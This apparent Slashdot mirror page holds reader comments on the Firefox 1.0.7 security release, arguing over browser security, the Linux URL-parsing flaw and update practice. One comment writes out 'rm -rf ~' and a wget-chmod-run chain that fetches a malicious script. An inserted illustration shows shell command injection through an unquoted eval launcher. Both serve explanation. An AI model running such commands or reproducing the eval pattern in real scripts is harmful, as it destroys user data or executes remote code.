Slashdot Mirror


Firefox 1.0.7 Released

hackajar writes "Firefox 1.0.7 has been released today. From the announcement "Fixes are included for the international domain name (IDN) link buffer overflow vulnerability and the Linux command line URL parsing flaw. There are also other security and stability changes, including a fix for a crash experienced when using certain Proxy Auto-Config scripts. In addition, some regressions introduced by previous 1.0.x security updates have been resolved.""

23 of 366 comments

  1. Quick to the point by timeToy · · Score: 5, Insightful

    That perfectly fits with yesterday's news about the Mozilla Foundation being more reactive to security fixes than M$.

    1. Re:Quick to the point by shmlco · · Score: 2, Insightful
      I believe the actual story was about how Firefox was less secure. The spin on the story was that they're more reactive.

      BTW, the use of "spin" was deliberate. I've yet to see numbers for both sides that prove MF is more reactive than MS, even though it appears to be "common knowledge". IIRC, the last release (1.0.6) fixed bugs found in March.

      --
      Any sect, cult, or religion will legislate its creed into law if it acquires the political power to do so.
    2. Re:Quick to the point by Anonymous Coward · · Score: 1, Insightful

      It doesn't address why their vulnerabilities are slowly getting more and more critical as time progresses, and more numerous. The latest Firefox one from Secunia is marked "Extremely Critical" and affects... Unix/Linux systems only apparently. Kinda' an OSS double-whammy.

      For all the huffing and puffing people do about Moz browsers... they sure don't seem to be getting any "safer" despite all the claims of how it being open source means more eyes are looking for holes, etc, etc... Nor does it explain why the vulnerabilities are there in the first place if open source truly is supposed to be a "superior way" of doing things.

      Moz used to chastise MS for having any vulnerabilities in IE to begin with, and for their frequent patching. Now that Moz products have many vulnerabilities being discovered, Moz is patching them constantly and they've changed their tune to "but we patch them quickly!", conveniently ignoring the fact that they're on the same road as MS and IE, and that this same attitude was one they railed against MS for so long citing that it proved an "inferior way" of doing things.

      Making a browser ain't so easy after all, is it guys?

  2. No translated version by zdzichu · · Score: 5, Insightful

    And yet again, users of localised build were left in the cold.
    Think about your grandpa, who doesn't know English. He can't use the non-translated build and is left with a vulnerable, older version.
    Good work, Firefox developers!

    --
    :wq
    1. Re:No translated version by Zerbey · · Score: 2, Insightful

      My (dearly departed) Grandad would have taken one look at Firefox, scoffed at the idea of even using a computer, let alone using one, and gone back to his gardening (which he was really good at). This is why I miss him so much.

  3. Nasty bugs. by LurkerXXX · · Score: 4, Insightful

    The unix/linux bad-link problem allowing malicious URLs to run shell scripts is a bit nasty. Maybe Symantec wasn't entirely blowing smoke the other day with their warnings about Firefox not really being that much more secure than IE. The patches come out faster, but there sure are some nasty bugs in there yet.

    1. Re:Nasty bugs. by LurkerXXX · · Score: 2, Insightful
      No, but that doesn't matter a bit.

      Anyone can reinstall an OS in an hour. What matters is people's DATA. You know, pictures, documents, etc, accumulated over years. Stuff all users should back up but most users don't. Those are all things that can be trashed when an exploit hits them even when they aren't running as root.

      The OS being intact is real nice for your geek pride, but all the data files being trashed is a real loss to normal people.

    2. Re:Nasty bugs. by Zathrus · · Score: 4, Insightful

      Are you running Firefox as root?!?!

      `rm -rf ~`

      Because, of course, you wouldn't have anything valuable stored in your home directory, would you?

      Not to mention that root privileges are not required to do a lot of things... like, oh say:


      wget ftp://somesite/malicious_script && chmod +x malicious_script && ./malicious_script


      What does malicious script do? Anything it wants -- including downloading and running root kits (after figuring out exactly which ones you are vulnerable to), sending out massive spam attacks, installing a user-level trojan that allows for remote controlled DDoS, etc.

      I'm really tired of people claiming that not running as root is a miracle cure. Yes, it prevents some really nasty trivial attacks, but it doesn't protect your most valuable data (e.g. -- yours) and it doesn't prevent a lot of attacks that are perfectly happy to run in non-privileged space.

    3. Re:Nasty bugs. by miffo.swe · · Score: 4, Insightful

      The problem isn't in Firefox itself but rather in the script used to launch Firefox from other applications. It demands launching a command from another application under your control going through bash. You can't be subjected to this by browsing around on the net, for example. It demands user intervention to function. While I admit it's a flaw, it's in no way as critical as some purport it to be. A similar flaw in Internet Explorer gets a minor threat rating.

      There really needs to be some standard for rating security holes.

      I mean, if this is rated very critical what the heck do you call a remote exploit? Very,very,very critical or what? Secunia, rated 7/5?

      There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they haven't once, to my knowledge, criticized Internet Explorer even when it had a critical patch coming out pretty much every day.

      --
      HTTP/1.1 400
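The mechanism miffo.swe describes above (a URL handed to a launcher script and re-parsed by bash) and the point Zathrus makes two comments earlier (whatever gets injected runs with the user's own privileges, which is all it takes to reach everything in the home directory), as an added illustration that is not part of the original thread and is not the actual Firefox launcher script: a hypothetical wrapper that splices the URL unquoted into a command string the shell evaluates, beside a fixed wrapper that passes it as a single quoted argument. `browser` is a stand-in for the real binary, `payload` a harmless canary, and the crafted URLs are constructed sample input.

```shell
#!/bin/sh
# Added illustration, not the real Firefox launcher. Shows why passing a URL
# through an unquoted shell command string lets the URL's contents run as
# commands, and why handing it over as one quoted argument does not.

# Stand-in for the browser binary: just echoes what it was handed.
browser() {
    printf 'browser got: %s\n' "$@"
}

# Harmless canary standing in for whatever an attacker's URL would really
# run (rm -rf ~, a wget-and-execute chain, ...). Counts how often it fired.
payload_ran=0
payload() {
    payload_ran=$((payload_ran + 1))
}

# VULNERABLE launcher: the URL is spliced into a command string which the
# shell re-parses, so ';', '&&', '|' and friends inside the URL become
# command separators. eval stands in for "sh -c ..." here so that the canary
# runs in this same shell and its counter can be observed afterwards.
launch_vulnerable() {
    eval "browser $1"
}

# FIXED launcher: the URL is one quoted argument. The shell never re-parses
# its contents; metacharacters reach the browser verbatim.
launch_fixed() {
    browser "$1"
}

# Runs launcher $1 on URL $2; succeeds (exit 0) iff the canary fired.
payload_triggered() {
    payload_ran=0
    "$1" "$2" >/dev/null
    [ "$payload_ran" -ne 0 ]
}

# Constructed sample inputs: one ordinary URL and two crafted ones.
BENIGN_URL='http://example.invalid/page'
EVIL_URL_SEMI='http://example.invalid/;payload'
EVIL_URL_AND='http://example.invalid/ && payload'

# Demonstration when run directly: each launcher against each URL.
for launcher in launch_vulnerable launch_fixed; do
    for url in "$BENIGN_URL" "$EVIL_URL_SEMI" "$EVIL_URL_AND"; do
        if payload_triggered "$launcher" "$url"; then
            echo "$launcher [$url]: canary RAN"
        else
            echo "$launcher [$url]: canary did not run"
        fi
    done
done
```

The fix is nothing more than the double quotes around `"$1"`, which is why wrapper scripts of this kind are worth auditing for every `eval`, `sh -c "... $var ..."` and backtick that carries data from outside the script.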
    4. Re:Nasty bugs. by 14erCleaner · · Score: 5, Insightful
      There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they haven't once, to my knowledge, criticized Internet Explorer even when it had a critical patch coming out pretty much every day.

      Symantec sells security software that covers up Microsoft vulnerabilities.

      If everybody stopped using IE and Outlook, half of their business might go away.

      --
      Have you read my blog lately?
  4. Colour me confused... by bad_outlook · · Score: 3, Insightful

    Ok, I'm a geek and all, but this week I just installed 1.5 Beta 1 - so is it now vuln to this, whereas 1.0.7 is not? I understand branches, tags and such, but after a while this could really confuse joe_user. Is anyone trying out the new Opera since it's now free? I've only tried the Win version, but darnit, it's very nice. Tonight I'll try it on Ubuntu, after updating FF to 1.0.7 of course (I don't run dev software at home, else I'll hear about it crashing from my wife! ;))

    1. Re:Colour me confused... by Winckle · · Score: 3, Insightful

      I very much doubt Joe Sixpack would be using a beta build of firefox

  5. Re:blah blah bugs blah blah security by cerelib · · Score: 2, Insightful

    Not to take either side on this, I have to disagree with the relevance of your argument. The web has changed drastically since IE was first made.

  6. One Fast Download! by SmartyFartBlast · · Score: 2, Insightful

    wow, amazing what speeds I saw on that, over 1mbit which is pretty nice. Sure it's not a super large file, but nice to see good speed when the server hasn't been /.'d

    Now I wonder if my extensions will crash or act buggy...ah, well....the price was right ;-)

  7. something concerns me by Dink Paisy · · Score: 5, Insightful
    "In addition, some regressions introduced by previous 1.0.x security updates have been resolved."

    Too many regressions caused by security updates, and people will turn off auto-update. That's the very reason that Microsoft moved to a monthly update cycle. Getting updates out quickly is important, but unless the security hole is being actively exploited, it's probably more important to make sure nothing else gets broken by the fix. If you convince people not to install updates, then you're in really big trouble.

    --

    Whoever corrects a mocker invites insult;
    whoever rebukes a wicked man incurs abuse.
    --Proverbs 9:7
    1. Re:something concerns me by amdotaku · · Score: 5, Insightful

      Indeed, this is the dark side to Firefox, its stand-alone update cycle. It's not friendly to extension developers, confuses and annoys users and administrators, and worst of all makes the whole distribution-based system the rest of FOSS uses go to pot. (Some people just want to run a version that comes with the distro without constant worrying and compatibility issues.) I think Firefox's special position at the head of the FOSS movement has made them focus too much on running their own tight ship and not enough on letting their users do the same.

  8. Great! by setzman · · Score: 4, Insightful

    Now will it stop using anywhere from 73,788 K to 253,000 K RAM? I thought Firefox was supposed to be small and efficient, but that's the RAM usage reported by Task Manager.

    --
    C:\>
    1. Re:Great! by ergo98 · · Score: 2, Insightful

      I got this all the time too - apparently this isn't a Firefox problem but instead a memory leak in the Flash plugin.

      I read the blog and it doesn't seem convincing - there is a bit of a comment about Flash being the culprit, but then he/she segues to limiting the use of memory for caching.

      Of course countless expanding memory caches have been misidentified as "leaks" over the years - SQL Server, for instance, will gobble up all available memory to use as a data cache, but it does it slowly as it pulls in data (just like Firefox does as you browse the web), utilizing memory as a much faster way of accessing data. As such there have been endless claims of SQL Server's "memory leak", and how people "solved" it by setting the governor limiting how much memory SQL Server will consume (all so they can sit and admire the high amount of unutilized available memory on their boxen). It should be noted that SQL Server relinquishes memory as other applications start asking for it (dunno if Firefox does the same).

      I suspect the Firefox "fix" is much the same.

  9. The M$ Take by IorDMUX · · Score: 2, Insightful

    Ah. Mozilla has leapt upon more discovered holes and promptly fixed them.

    And somehow, these fixes make the browser all the less secure in the eyes of the big guys.

    --
    >> Standing on head makes smile of frown, but rest of face also upside down.
  10. Re:Unless? by Anonymous Coward · · Score: 2, Insightful

    In other words, is it worth replacing a critical bug (security) with a minor bug (annoyance)?
     
    If you value security over convenience, yes. Unfortunately, most people don't.

  11. Re:Don't use your distro tools to install it... by passthecrackpipe · · Score: 5, Insightful

    Heh, a list of many complex actions involving different user IDs, directories and other computer "magic" as seen from a user's perspective, followed by:

    "The install was as easy as anything packaged by Vise or InstallShield"

    Can you please pass some of that crack you seem to be smoking? I'm a big linux fan, but installing anything, not least a user install of firefox, does not compare with the "double click setup.exe" from Vise or InstallShield.

    And before all the fanboys knee-jerk with the security/spyware/virus/whatever-my-linux-kung-fu-is-so-cool-i-kick-your-ass stuff - I know, I use linux and firefox. But that still doesn't make it an easy install. The distro install, incidentally, is pretty easy though, so just wait for the vendor updates mmmkay?

    --
    People who think they know everything are a great annoyance to those of us who do.
  12. Mod parent +25. by khasim · · Score: 3, Insightful

    It seems that certain organizations are trying to hype every vulnerability that can be associated with FireFox. From my point of view they'd be ranked like this:

    #1. Remote root access that does NOT require human intervention or other app running.

    #2. Remote non-root access that does NOT require human intervention or other app running.

    #3. Local root access that does NOT require human intervention or other app running.

    #4. Local non-root access that does NOT require human intervention or other app running.

    #5. Local root access that requires some human interaction or some combination of apps.

    #6. Local non-root access that requires some human interaction or some combination of apps (this is where this exploit is)

    #7. Remote OS crash

    #8. Remote app crash

    #9. Local OS crash

    #10. Local app crash

    This is MY opinion. Get your own opinion. There is no way this exploit is "critical". It's one step above a stupid DoS attack and would NOT affect ANY of my servers.

  13. Re:Don't use your distro tools to install it... by shaitand · · Score: 2, Insightful

    This is a pretty serious troll. There is no install on Windows, InstallShield or otherwise, that you can install with a double click. The double-click starts the installer, then you answer a series of questions. Afterward, you configure the app manually.

    On linux you apt-get install app or select it and then click install in Synaptic. Then configure the app manually. For many things you can simply run appname-configure afterward to configure.

    In case you haven't noticed, the processes are mostly the same, except that linux does not require you to answer the string of questions.